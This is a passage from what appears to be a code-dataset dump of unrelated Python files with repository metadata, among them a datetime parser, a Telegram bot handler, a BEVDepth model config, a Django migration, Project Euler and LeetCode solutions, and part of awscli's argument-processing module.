        + Group(date_expr + comma + (YEAR | MONTH | WEEK) + ppOptional(comma))
        + rparen
    ).setParseAction(EvalLastDayFunc)
    holiday_func <<= (
        HOLIDAY
        + lparen
        + Group(
            text_operand
            + ppOptional(comma)
            + ppOptional(date_expr)
            + ppOptional(comma)
            + ppOptional(text_operand)
            + ppOptional(comma)
        )
        + rparen
    ).setParseAction(EvalHolidayFunc)
    return date_expr
def datetime_eval(datetime_expression: Optional[str] = None) -> Optional[datetime]:
    """Parse and evaluate a datetime expression string.

    Returns ``None`` for an empty/missing expression; raises ``ValueError``
    (wrapping the original ``ParseException``) for a malformed one.
    """
    if not datetime_expression:
        return None
    try:
        parsed = datetime_parser().parseString(datetime_expression)
        return parsed[0].eval()
    except ParseException as ex:
        raise ValueError(ex) from ex
class DateRangeMigration:  # pylint: disable=too-few-public-methods
    """Regex constants used to migrate legacy ``time_range`` strings.

    Each pattern matches a relative date unit of the form
    "N day/week/month/quarter/year(s)" inside a serialized time range.
    """

    # Relative unit appearing in the "since" (left of " : ") half.
    x_dateunit_in_since = (
        r'"time_range":\s*"\s*[0-9]+\s+(day|week|month|quarter|year)s?\s*\s:\s'
    )
    # Relative unit appearing in the "until" (right of " : ") half.
    x_dateunit_in_until = (
        r'"time_range":\s*".*\s:\s*[0-9]+\s+(day|week|month|quarter|year)s?\s*"'
    )
    # A string consisting entirely of a single relative unit.
    x_dateunit = r"^\s*[0-9]+\s+(day|week|month|quarter|year)s?\s*$"
| [
"noreply@github.com"
] | j420247.noreply@github.com |
897f1e3a9e728d1fa9d621e94dc4fd26b2179861 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sdssj_203512.89+152029.3/sdB_sdssj_203512.89+152029.3_lc.py | ed34883c535f2590c57d4ff4b91b6ce2db5f9d5f | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from gPhoton.gAperture import gAperture
def main():
    """Extract a light curve for sdB star SDSS J203512.89+152029.3.

    Single call into gPhoton's gAperture photometry in the NUV band at the
    star's sky position, writing results to a hard-coded CSV path.
    (Aperture/annulus radii are in the units gAperture expects --
    presumably degrees; confirm against the gAperture documentation.)
    """
    gAperture(band="NUV", skypos=[308.803708,15.341472], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_sdssj_203512.89+152029.3/sdB_sdssj_203512.89+152029.3_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)

if __name__ == "__main__":
    main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
b28f4481f84cc96b3adba71e3715fbe9ff783705 | f2cece9e5f2af8482c12fc7ad8b3a7e63e6de052 | /tbot/handlers/user/start.py | 4b2ae37538b4ce57deaca2c8b96805159c068fa2 | [] | no_license | nikifkon-old/questionnaire_bot | beadc716ca0a7cbfa6a4c47039c00123e8892eb4 | 3cbf889c7edf4ba438ce7e46c5f9b67efe5d7e72 | refs/heads/master | 2023-04-24T07:12:28.227259 | 2020-08-03T09:14:35 | 2020-08-03T09:14:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,186 | py | from aiogram import types
from tbot import messages, schemas
from tbot.bot import bot
from tbot.handlers.utils import process_if_user_exit, send_welcome_message
from tbot.utils import save_user
from .register import bot_register
async def bot_start(message: types.Message):
    """Handle the /start command.

    Flow: bail out if the user-exists check says so; without a deep-link
    payload, greet and hand over to registration; with a payload, create
    the user for a valid house string or report the parse error.
    """
    chat_id = message.chat.id
    if not await process_if_user_exit(user_id=chat_id):
        return

    payload = message.get_args()
    if not payload:
        # Plain /start: greet and move on to registration.
        await bot.send_message(
            chat_id=chat_id,
            text=messages.START_MESSAGE
        )
        await bot_register(message)
        return

    house, created = schemas.House.from_string(payload)
    if created:
        new_user = schemas.User(
            id=chat_id,
            house=house,
            lang=message.from_user.language_code,
        )
        save_user(new_user)
        await send_welcome_message(new_user)
    else:
        # Parsing failed: ``house`` carries the error description.
        await bot.send_message(
            chat_id=chat_id,
            text=messages.INVALID_START_PAYLOAD_ERROR.format(error_message=house["error_msg"])
        )
| [
"kostya.nik.3854@gmail.com"
] | kostya.nik.3854@gmail.com |
f811d2d33cb606d533dd48f19f66579b24eae8f0 | 81d2e3b6fe042e70cc2abb7f549f60ba44928fdf | /binarysearch/167.two-sum-ii-input-array-is-sorted.py | 5263d1575f7673caccb884b02909c3aa8860a62f | [] | no_license | weizhixiaoyi/leetcode | a506faed3904342ed65234864df52071977d544d | 6114ebacc939f48a39a56d366646b0f28b4f6c1a | refs/heads/master | 2022-12-22T03:52:07.936800 | 2020-09-29T07:49:52 | 2020-09-29T07:49:52 | 202,662,720 | 5 | 2 | null | 2019-08-17T09:24:49 | 2019-08-16T05:16:08 | C++ | UTF-8 | Python | false | false | 1,303 | py | # -*- coding:utf-8 -*-
from typing import List
class Solution:
    """LeetCode 167 -- Two Sum II (input array is sorted)."""

    def twoSum(self, numbers: List[int], target: int) -> List[int]:
        """Return 1-based indices of the two entries summing to ``target``.

        Two-pointer scan: since ``numbers`` is sorted ascending, a pair sum
        that is too small means the left pointer must advance, and one that
        is too large means the right pointer must retreat.
        """
        left, right = 0, len(numbers) - 1
        while left < right:
            pair_sum = numbers[left] + numbers[right]
            if pair_sum == target:
                return [left + 1, right + 1]
            if pair_sum < target:
                left += 1
            else:
                right -= 1
if __name__ == '__main__':
    # Quick manual check of the two-pointer solution.
    sample = [1, 2, 3, 4, 4, 5]
    wanted_sum = 8
    ans = Solution().twoSum(sample, wanted_sum)
    print('ans: ', ans)
| [
"zhenhai.gl@gmail.com"
] | zhenhai.gl@gmail.com |
79f82030a48735a86adfccce5e9f80853fc062fe | 81a62053841c03d9621fd31f8e7984c712c7aed2 | /zoo/BEVDepth/exps/mv/bev_depth_lss_r50_256x704_128x128_20e_cbgs_2key_da.py | 5ed3cd169fb3435f26326fe5c7432fe9302e61be | [
"MIT"
] | permissive | Daniel-xsy/BEV-Attack | d0eb3a476875f9578c53df9bcb21564dea18ce0c | 7970b27396c1af450c80b12eb312e76a8ab52a0a | refs/heads/master | 2023-05-23T01:13:44.121533 | 2023-02-22T05:48:14 | 2023-02-22T05:48:14 | 540,328,937 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,038 | py | # Copyright (c) Megvii Inc. All rights reserved.
"""
mAP: 0.3484
mATE: 0.6159
mASE: 0.2716
mAOE: 0.4144
mAVE: 0.4402
mAAE: 0.1954
NDS: 0.4805
Eval time: 110.7s
Per-class results:
Object Class AP ATE ASE AOE AVE AAE
car 0.553 0.480 0.157 0.117 0.386 0.205
truck 0.252 0.645 0.202 0.097 0.381 0.185
bus 0.378 0.674 0.197 0.090 0.871 0.298
trailer 0.163 0.932 0.230 0.409 0.543 0.098
construction_vehicle 0.076 0.878 0.495 1.015 0.103 0.344
pedestrian 0.361 0.694 0.300 0.816 0.491 0.247
motorcycle 0.319 0.569 0.252 0.431 0.552 0.181
bicycle 0.286 0.457 0.255 0.630 0.194 0.006
traffic_cone 0.536 0.438 0.339 nan nan nan
barrier 0.559 0.392 0.289 0.124 nan nan
"""
import torch
import torch.nn as nn
from torch.cuda.amp.autocast_mode import autocast
from torch.optim.lr_scheduler import MultiStepLR
from exps.base_cli import run_cli
from exps.mv.bev_depth_lss_r50_256x704_128x128_24e_2key import \
BEVDepthLightningModel as BaseBEVDepthLightningModel
from layers.backbones.base_lss_fpn import BaseLSSFPN as BaseLSSFPN
from layers.heads.bev_depth_head import BEVDepthHead
from models.base_bev_depth import BaseBEVDepth as BaseBEVDepth
class DepthAggregation(nn.Module):
    """Small residual conv stack refining per-pixel depth-weighted features."""

    def __init__(self, in_channels, mid_channels, out_channels):
        super(DepthAggregation, self).__init__()

        def conv_bn_relu(cin, cout):
            # 3x3 conv (stride 1, padding 1, no bias) -> BatchNorm -> ReLU.
            return [
                nn.Conv2d(cin,
                          cout,
                          kernel_size=3,
                          stride=1,
                          padding=1,
                          bias=False),
                nn.BatchNorm2d(cout),
                nn.ReLU(inplace=True),
            ]

        # Attribute names and Sequential layer ordering are kept identical to
        # the original module so existing state_dicts/checkpoints still load.
        self.reduce_conv = nn.Sequential(*conv_bn_relu(in_channels, mid_channels))
        self.conv = nn.Sequential(
            *conv_bn_relu(mid_channels, mid_channels),
            *conv_bn_relu(mid_channels, mid_channels),
        )
        self.out_conv = nn.Sequential(
            nn.Conv2d(mid_channels,
                      out_channels,
                      kernel_size=3,
                      stride=1,
                      padding=1,
                      bias=True),
        )

    @autocast(False)
    def forward(self, x):
        # Project to mid_channels, apply a residual double-conv refinement,
        # then project to out_channels. Decorated autocast(False): always
        # runs in full precision even under mixed-precision training.
        x = self.reduce_conv(x)
        x = x + self.conv(x)
        return self.out_conv(x)
class LSSFPN(BaseLSSFPN):
    """BaseLSSFPN variant that adds a per-pixel depth aggregation network."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.depth_aggregation_net = self._configure_depth_aggregation_net()

    def _configure_depth_aggregation_net(self):
        """build pixel cloud feature extractor"""
        return DepthAggregation(self.output_channels, self.output_channels,
                                self.output_channels)

    def _forward_voxel_net(self, img_feat_with_depth):
        """Refine depth-weighted image features with the aggregation net.

        Input/output layout is [n, c, d, h, w] (per the conversion comments
        below); the tensor is reshaped so a 2D conv can run over the (w, d)
        plane for every (n, h) slice.
        """
        # BEVConv2D [n, c, d, h, w] -> [n, h, c, w, d]
        img_feat_with_depth = img_feat_with_depth.permute(
            0, 3, 1, 4, 2).contiguous()  # [n, c, d, h, w] -> [n, h, c, w, d]
        n, h, c, w, d = img_feat_with_depth.shape
        # Fold (n, h) into the batch axis so the conv treats (w, d) as an image.
        img_feat_with_depth = img_feat_with_depth.view(-1, c, w, d)
        # Run the aggregation net, then restore the original layout (and
        # force float32, matching the autocast(False) forward).
        img_feat_with_depth = (
            self.depth_aggregation_net(img_feat_with_depth).view(
                n, h, c, w, d).permute(0, 2, 4, 1, 3).contiguous().float())
        return img_feat_with_depth
class BEVDepth(BaseBEVDepth):
    """BEV detector wiring the depth-aggregating LSSFPN backbone to the head.

    NOTE(review): ``super(BaseBEVDepth, self).__init__()`` deliberately
    *skips* BaseBEVDepth.__init__ and jumps to the next class in the MRO
    (nn.Module), presumably so the parent does not construct its own
    backbone/head first -- confirm against BaseBEVDepth before "fixing" it.
    """

    def __init__(self, backbone_conf, head_conf, is_train_depth=True):
        super(BaseBEVDepth, self).__init__()
        self.backbone = LSSFPN(**backbone_conf)
        self.head = BEVDepthHead(**head_conf)
        # Flag read elsewhere (e.g. by forward); kept as a plain attribute.
        self.is_train_depth = is_train_depth
class BEVDepthLightningModel(BaseBEVDepthLightningModel):
    """Experiment module using the depth-aggregation BEVDepth model."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Replace the base model with the depth-aggregation variant.
        self.model = BEVDepth(self.backbone_conf,
                              self.head_conf,
                              is_train_depth=True)
        # Presumably enables class-balanced grouping/sampling (CBGS) in the
        # data pipeline -- confirm against the base Lightning module.
        self.data_use_cbgs = True

    def configure_optimizers(self):
        # Linear-scaling rule: per-image base LR times the effective batch.
        scaled_lr = (self.basic_lr_per_img
                     * self.batch_size_per_device
                     * self.gpus)
        opt = torch.optim.AdamW(self.model.parameters(),
                                lr=scaled_lr,
                                weight_decay=1e-7)
        # Step the LR down at epochs 16 and 19 of the 20-epoch schedule.
        sched = MultiStepLR(opt, [16, 19])
        return [[opt], [sched]]
if __name__ == '__main__':
    # Launch training/evaluation through the shared CLI under this
    # experiment's canonical name.
    run_cli(BEVDepthLightningModel,
            'bev_depth_lss_r50_256x704_128x128_20e_cbgs_2key_da')
| [
"1491387884@qq.com"
] | 1491387884@qq.com |
54b776d05894dbd7304491d291348150d9dee7f7 | 251af797da940483d843077cfe1912acd019e73e | /sis/schedule/migrations/0001_initial.py | bddf4e281d27779ecb610321405d32bca51de9cf | [] | no_license | mitctc/sis | 951d57fce1376947cbc6a00594d17c1cfb5f78d6 | 9a955b6c12cae977bd45ff6025a87b492fa0f6e1 | refs/heads/master | 2021-05-30T13:12:10.705276 | 2016-02-14T02:23:01 | 2016-02-14T02:23:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,537 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-09 14:09
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: LabSession, PracticalSession and TheorySession.

    Auto-generated by Django (see the header comment above); edit with care.
    NOTE(review): only PracticalSession carries a ``user`` foreign key, yet
    all three models record ``is_present`` -- confirm Lab/Theory sessions
    are intentionally not linked to a user.
    """

    initial = True

    dependencies = [
        # Needs the (swappable) user model and the course app's Activity.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('course', '0010_auto_20160209_0828'),
    ]

    operations = [
        migrations.CreateModel(
            name='LabSession',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=120)),
                ('start_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
                ('end_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
                ('is_present', models.BooleanField()),
                ('activity', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='course.Activity')),
            ],
        ),
        migrations.CreateModel(
            name='PracticalSession',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=120)),
                ('start_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
                ('end_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
                ('is_present', models.BooleanField()),
                ('activity', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='course.Activity')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='TheorySession',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=120)),
                ('start_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
                ('end_time', models.DateTimeField(blank=True, default=datetime.datetime.now)),
                ('is_present', models.BooleanField()),
                ('activity', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='course.Activity')),
            ],
        ),
    ]
| [
"sumudu.susahe@gmail.com"
] | sumudu.susahe@gmail.com |
27e371636f02b8abf128178364910ed7e959ff49 | 891902687207fb335b65dbb8d31d6e20301764f9 | /pe103.py | 87cd77af804629f8d4877da843a2d8a0c204e281 | [] | no_license | maecchi/PE | 93bd050eaca2733aa37db6ca493b820fe3d7a351 | 3d9092635807f0036719b65adb16f1c0926c2321 | refs/heads/master | 2020-05-04T16:38:36.476355 | 2012-06-10T05:26:10 | 2012-06-10T05:26:10 | 1,746,853 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,651 | py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#
# pe103.py - Project Euler
#
# 題意の規則に乗っ取って条件を作成する
from itertools import *
N = 7
#
def findsSum(a, n):
    """Return True if some subset of ``a`` sums exactly to ``n``.

    Assumes non-negative elements (the ``n < 0`` prune relies on it).
    Fix: the original wrapped both recursive calls in ``any((..., ...))``,
    which builds the tuple eagerly and therefore always evaluated *both*
    branches; ``or`` restores short-circuiting with identical results.
    """
    if n == 0:
        return True
    if n < 0 or not a:
        return False
    rest = a[1:]
    # Either the first element is in the subset, or it is not.
    return findsSum(rest, n - a[0]) or findsSum(rest, n)
# No two disjoint subsets may have equal sums (partial check): for every
# subset of size >= 3, verify it cannot be split into two equal halves
# where one half contains the subset's largest element.
def condition1(a):
    def balanced_split_free(subset):
        total = sum(subset)
        if total % 2 == 1:
            # An odd total can never split into two equal halves.
            return True
        # Can the remaining elements make up half the total alongside the
        # largest element? If so, an equal split exists -> condition fails.
        target = total // 2 - subset[-1]
        return not findsSum(subset[:-1], target)

    return all(balanced_split_free(b)
               for size in range(3, len(a) + 1)
               for b in combinations(a, size))
# The subset with more elements must have the larger sum: the first
# ceil(n/2) elements must outweigh the last floor(n/2) elements.
def condition2(a):
    """Return True if the larger-half sum condition holds for sorted ``a``.

    Fix: the original used ``/`` for the slice indices, which is Python-2
    integer division; under Python 3 it yields floats and slicing raises
    TypeError. ``//`` preserves the Python 2 behavior and works on both.
    """
    n = len(a)
    return sum(a[:(n + 1) // 2]) > sum(a[n // 2 + 1:])
# Check that both special-sum-set conditions hold.
def isValid(a):
    # condition2 is the cheap size-vs-sum comparison; test it first so the
    # expensive subset-sum search in condition1 is skipped when possible.
    if not condition2(a):
        return False
    return condition1(a)
# Enumerate candidate sets near ``a``: each element may range from a[k]-2
# to a[k]+1, while the sequence stays strictly increasing.
#   a:    reference set elements
#   prev: value chosen for the previous position
#   k:    index of the position currently being chosen
def genSets(a, prev=0, k=0):
    if k == len(a):
        yield []
        return
    # Candidates stay within -2..+1 of a[k], strictly above the previous
    # value, and (except at the last position) strictly below a[k+1].
    lo = max(a[k] - 2, prev + 1)
    hi = a[k] + 1 if k == len(a) - 1 else min(a[k] + 1, a[k + 1] - 1)
    for value in range(lo, hi + 1):
        for tail in genSets(a, value, k + 1):
            yield [value] + tail
# Among all valid candidate sets around ``a``, pick the one with the
# smallest element sum (first such set on ties, as min() guarantees).
def minimize(a):
    valid_sets = (b for b in genSets(a) if isValid(b))
    return min(valid_sets, key=sum)
# Derive the next optimum candidate from the previous one (Project Euler
# 103 rule): take the middle element b and search around {b} + {b + e}.
def nextSet(a):
    """Return the optimum special sum set one size larger than ``a``.

    Fix: the original indexed with ``a[n/2]`` -- Python-2-only integer
    division that raises TypeError under Python 3. ``//`` keeps the index
    an int on both versions with identical results.
    """
    n = len(a)
    middle = a[n // 2]
    return minimize([middle] + [e + middle for e in a])
# Fold nextSet over k = 2..N, growing the special sum set from {1}; the
# lambda's second argument is unused -- each step only refines the previous
# set. Then print the answer's digits concatenated. (Python 2 script:
# ``print`` statement and builtin ``reduce``.)
a = reduce(lambda x, y : nextSet(x), range(2, N+1), [1])
print "".join(map(str, a))
| [
"aos81922710@yahoo.co.jp"
] | aos81922710@yahoo.co.jp |
c174095d9ba03d8fb0442391289c0b3348b8c63e | ee052fca7b7cdf875b3e18f28f6102395407d584 | /python/example/objects.py | 2218d352afd3c9582e59cca26ab888f4c26106a8 | [] | no_license | vimm0/algorithm-challenges | 8313813dbbba0dff4c0d872d68c74f9b508d956f | f4ae12b7a33340b8f3c4ce105b7ef3fb9f24e613 | refs/heads/master | 2020-03-26T23:51:52.913657 | 2018-10-30T16:16:52 | 2018-10-30T16:16:52 | 145,573,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,322 | py | #!/usr/bin/python
from builtins import staticmethod, str
class InvoiceItem:
    """
    An item within the invoice.

    Keyword args:
        text: description of the item (defaults to '').
        amt:  amount charged for the item (defaults to 0).
    """

    def __str__(self):
        return self.text + ' ' + str(self.amt)

    def __init__(self, **kwargs):
        self.text = ''
        self.amt = 0
        # Fix: use .get() so an omitted keyword falls back to the default
        # above. The original indexed kwargs directly, raising KeyError and
        # making both keywords effectively mandatory despite the defaults.
        if kwargs.get('text') is not None:
            self.text = kwargs['text']
        if kwargs.get('amt') is not None:
            self.amt = kwargs['amt']
class Invoice:
    """An invoice: a numbered, dated collection of items for a client."""

    # Class attribute shared by all invoices.
    my_company_name = "DIYComputerScience"

    @staticmethod
    def get_service_tax_per():
        """Return the flat service-tax percentage."""
        return 12.5

    def __str__(self):
        return self.number + ' ' + str(self.amt())

    def __init__(self, **kwargs):
        self.number = ''
        self.client = ''
        self.date = ''
        self.invoice_items = []

    def add_invoice_item(self, invoice_entry):
        """Append one item (anything exposing ``.amt``) to the invoice."""
        self.invoice_items.append(invoice_entry)

    def amt(self):
        """Return the total of all item amounts (0 for an empty invoice)."""
        return sum(entry.amt for entry in self.invoice_items)
# Demo: build one invoice with a single line item and print it
# ("<number> <total>", i.e. "20080422_01 2000").
invoice = Invoice()
invoice.number = '20080422_01'
invoice.client = 'Sun Microsystems'
invoice.date = '22/04/2008'
invoice_item = InvoiceItem(text='consulting April', amt=2000)
invoice.add_invoice_item(invoice_item)
print(invoice)
| [
"vimmrana0@gmail.com"
] | vimmrana0@gmail.com |
19493802781bbd6845ba8f897d5a7004bda11c51 | e4a428b91a6c4ff15f98a8109bfddbb3182fa9f3 | /Lib/site-packages/awscli/argprocess.py | 1d91e63e952a37550a1a9f66bf68e2c8aeac7924 | [
"MIT"
] | permissive | bopopescu/django-estore | 59a906f9cbc7da2f1aa9dda08ac05595744975a9 | c092ffa965b8ef68e71d27d34a17fde1beacd90e | refs/heads/master | 2022-11-22T14:11:13.051232 | 2017-03-15T03:49:15 | 2017-03-15T03:49:15 | 281,940,168 | 0 | 0 | MIT | 2020-07-23T12:04:17 | 2020-07-23T12:04:17 | null | UTF-8 | Python | false | false | 20,751 | py | # Copyright 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Module for processing CLI args."""
import os
import logging
from awscli.compat import six
from botocore.compat import OrderedDict, json
from awscli import SCALAR_TYPES, COMPLEX_TYPES
from awscli.paramfile import get_paramfile, ResourceLoadingError
from awscli.paramfile import PARAMFILE_DISABLED
from awscli import shorthand
from awscli.utils import find_service_and_method_in_event_name
LOG = logging.getLogger('awscli.argprocess')
class ParamError(Exception):
def __init__(self, cli_name, message):
"""
:type cli_name: string
:param cli_name: The complete cli argument name,
e.g. "--foo-bar". It should include the leading
hyphens if that's how a user would specify the name.
:type message: string
:param message: The error message to display to the user.
"""
full_message = ("Error parsing parameter '%s': %s" %
(cli_name, message))
super(ParamError, self).__init__(full_message)
self.cli_name = cli_name
self.message = message
class ParamSyntaxError(Exception):
pass
class ParamUnknownKeyError(Exception):
def __init__(self, key, valid_keys):
valid_keys = ', '.join(valid_keys)
full_message = (
"Unknown key '%s', valid choices "
"are: %s" % (key, valid_keys))
super(ParamUnknownKeyError, self).__init__(full_message)
class TooComplexError(Exception):
pass
def unpack_argument(session, service_name, operation_name, cli_argument, value):
"""
Unpack an argument's value from the commandline. This is part one of a two
step process in handling commandline arguments. Emits the load-cli-arg
event with service, operation, and parameter names. Example::
load-cli-arg.ec2.describe-instances.foo
"""
param_name = getattr(cli_argument, 'name', 'anonymous')
value_override = session.emit_first_non_none_response(
'load-cli-arg.%s.%s.%s' % (service_name,
operation_name,
param_name),
param=cli_argument, value=value, service_name=service_name,
operation_name=operation_name)
if value_override is not None:
value = value_override
return value
def uri_param(event_name, param, value, **kwargs):
"""Handler that supports param values from URIs.
"""
cli_argument = param
qualified_param_name = '.'.join(event_name.split('.')[1:])
if qualified_param_name in PARAMFILE_DISABLED or \
getattr(cli_argument, 'no_paramfile', None):
return
else:
return _check_for_uri_param(cli_argument, value)
def _check_for_uri_param(param, value):
if isinstance(value, list) and len(value) == 1:
value = value[0]
try:
return get_paramfile(value)
except ResourceLoadingError as e:
raise ParamError(param.cli_name, six.text_type(e))
def detect_shape_structure(param):
stack = []
return _detect_shape_structure(param, stack)
def _detect_shape_structure(param, stack):
if param.name in stack:
return 'recursive'
else:
stack.append(param.name)
try:
if param.type_name in SCALAR_TYPES:
return 'scalar'
elif param.type_name == 'structure':
sub_types = [_detect_shape_structure(p, stack)
for p in param.members.values()]
# We're distinguishing between structure(scalar)
# and structure(scalars), because for the case of
# a single scalar in a structure we can simplify
# more than a structure(scalars).
if len(sub_types) == 1 and all(p == 'scalar' for p in sub_types):
return 'structure(scalar)'
elif len(sub_types) > 1 and all(p == 'scalar' for p in sub_types):
return 'structure(scalars)'
else:
return 'structure(%s)' % ', '.join(sorted(set(sub_types)))
elif param.type_name == 'list':
return 'list-%s' % _detect_shape_structure(param.member, stack)
elif param.type_name == 'map':
if param.value.type_name in SCALAR_TYPES:
return 'map-scalar'
else:
return 'map-%s' % _detect_shape_structure(param.value, stack)
finally:
stack.pop()
def unpack_cli_arg(cli_argument, value):
"""
Parses and unpacks the encoded string command line parameter
and returns native Python data structures that can be passed
to the Operation.
:type cli_argument: :class:`awscli.arguments.BaseCLIArgument`
:param cli_argument: The CLI argument object.
:param value: The value of the parameter. This can be a number of
different python types (str, list, etc). This is the value as
it's specified on the command line.
:return: The "unpacked" argument than can be sent to the `Operation`
object in python.
"""
return _unpack_cli_arg(cli_argument.argument_model, value,
cli_argument.cli_name)
def _unpack_cli_arg(argument_model, value, cli_name):
if argument_model.type_name in SCALAR_TYPES:
return unpack_scalar_cli_arg(
argument_model, value, cli_name)
elif argument_model.type_name in COMPLEX_TYPES:
return _unpack_complex_cli_arg(
argument_model, value, cli_name)
else:
return six.text_type(value)
def _unpack_complex_cli_arg(argument_model, value, cli_name):
type_name = argument_model.type_name
if type_name == 'structure' or type_name == 'map':
if value.lstrip()[0] == '{':
try:
return json.loads(value, object_pairs_hook=OrderedDict)
except ValueError as e:
raise ParamError(
cli_name, "Invalid JSON: %s\nJSON received: %s"
% (e, value))
raise ParamError(cli_name, "Invalid JSON:\n%s" % value)
elif type_name == 'list':
if isinstance(value, six.string_types):
if value.lstrip()[0] == '[':
return json.loads(value, object_pairs_hook=OrderedDict)
elif isinstance(value, list) and len(value) == 1:
single_value = value[0].strip()
if single_value and single_value[0] == '[':
return json.loads(value[0], object_pairs_hook=OrderedDict)
try:
# There's a couple of cases remaining here.
# 1. It's possible that this is just a list of strings, i.e
# --security-group-ids sg-1 sg-2 sg-3 => ['sg-1', 'sg-2', 'sg-3']
# 2. It's possible this is a list of json objects:
# --filters '{"Name": ..}' '{"Name": ...}'
member_shape_model = argument_model.member
return [_unpack_cli_arg(member_shape_model, v, cli_name)
for v in value]
except (ValueError, TypeError) as e:
# The list params don't have a name/cli_name attached to them
# so they will have bad error messages. We're going to
# attach the parent parameter to this error message to provide
# a more helpful error message.
raise ParamError(cli_name, value[0])
def unpack_scalar_cli_arg(argument_model, value, cli_name=''):
# Note the cli_name is used strictly for error reporting. It's
# not required to use unpack_scalar_cli_arg
if argument_model.type_name == 'integer' or argument_model.type_name == 'long':
return int(value)
elif argument_model.type_name == 'float' or argument_model.type_name == 'double':
# TODO: losing precision on double types
return float(value)
elif argument_model.type_name == 'blob' and \
argument_model.serialization.get('streaming'):
file_path = os.path.expandvars(value)
file_path = os.path.expanduser(file_path)
if not os.path.isfile(file_path):
msg = 'Blob values must be a path to a file.'
raise ParamError(cli_name, msg)
return open(file_path, 'rb')
elif argument_model.type_name == 'boolean':
if isinstance(value, six.string_types) and value.lower() == 'false':
return False
return bool(value)
else:
return value
def _is_complex_shape(model):
if model.type_name not in ['structure', 'list', 'map']:
return False
elif model.type_name == 'list':
if model.member.type_name not in ['structure', 'list', 'map']:
return False
return True
class ParamShorthand(object):
def _uses_old_list_case(self, service_name, operation_name, argument_name):
"""
Determines whether a given operation for a service needs to use the
deprecated shorthand parsing case for lists of structures that only have
a single member.
"""
cases = {
'firehose': {
'put-record-batch': ['records']
},
'workspaces': {
'reboot-workspaces': ['reboot-workspace-requests'],
'rebuild-workspaces': ['rebuild-workspace-requests'],
'terminate-workspaces': ['terminate-workspace-requests']
},
'elb': {
'remove-tags': ['tags'],
'describe-instance-health': ['instances'],
'deregister-instances-from-load-balancer': ['instances'],
'register-instances-with-load-balancer': ['instances']
}
}
cases = cases.get(service_name, {}).get(operation_name, [])
return argument_name in cases
class ParamShorthandParser(ParamShorthand):
def __init__(self):
self._parser = shorthand.ShorthandParser()
self._visitor = shorthand.BackCompatVisitor()
def __call__(self, cli_argument, value, event_name, **kwargs):
"""Attempt to parse shorthand syntax for values.
This is intended to be hooked up as an event handler (hence the
**kwargs). Given ``param`` object and its string ``value``,
figure out if we can parse it. If we can parse it, we return
the parsed value (typically some sort of python dict).
:type cli_argument: :class:`awscli.arguments.BaseCLIArgument`
:param cli_argument: The CLI argument object.
:type param: :class:`botocore.parameters.Parameter`
:param param: The parameter object (includes various metadata
about the parameter).
:type value: str
:param value: The value for the parameter type on the command
line, e.g ``--foo this_value``, value would be ``"this_value"``.
:returns: If we can parse the value we return the parsed value.
If it looks like JSON, we return None (which tells the event
emitter to use the default ``unpack_cli_arg`` provided that
no other event handlers can parsed the value). If we
run into an error parsing the value, a ``ParamError`` will
be raised.
"""
if not self._should_parse_as_shorthand(cli_argument, value):
return
else:
service_name, operation_name = \
find_service_and_method_in_event_name(event_name)
return self._parse_as_shorthand(
cli_argument, value, service_name, operation_name)
def _parse_as_shorthand(self, cli_argument, value, service_name,
operation_name):
try:
LOG.debug("Parsing param %s as shorthand",
cli_argument.cli_name)
handled_value = self._handle_special_cases(
cli_argument, value, service_name, operation_name)
if handled_value is not None:
return handled_value
if isinstance(value, list):
# Because of how we're using argparse, list shapes
# are configured with nargs='+' which means the ``value``
# is given to us "conveniently" as a list. When
# this happens we need to parse each list element
# individually.
parsed = [self._parser.parse(v) for v in value]
self._visitor.visit(parsed, cli_argument.argument_model)
else:
# Otherwise value is just a string.
parsed = self._parser.parse(value)
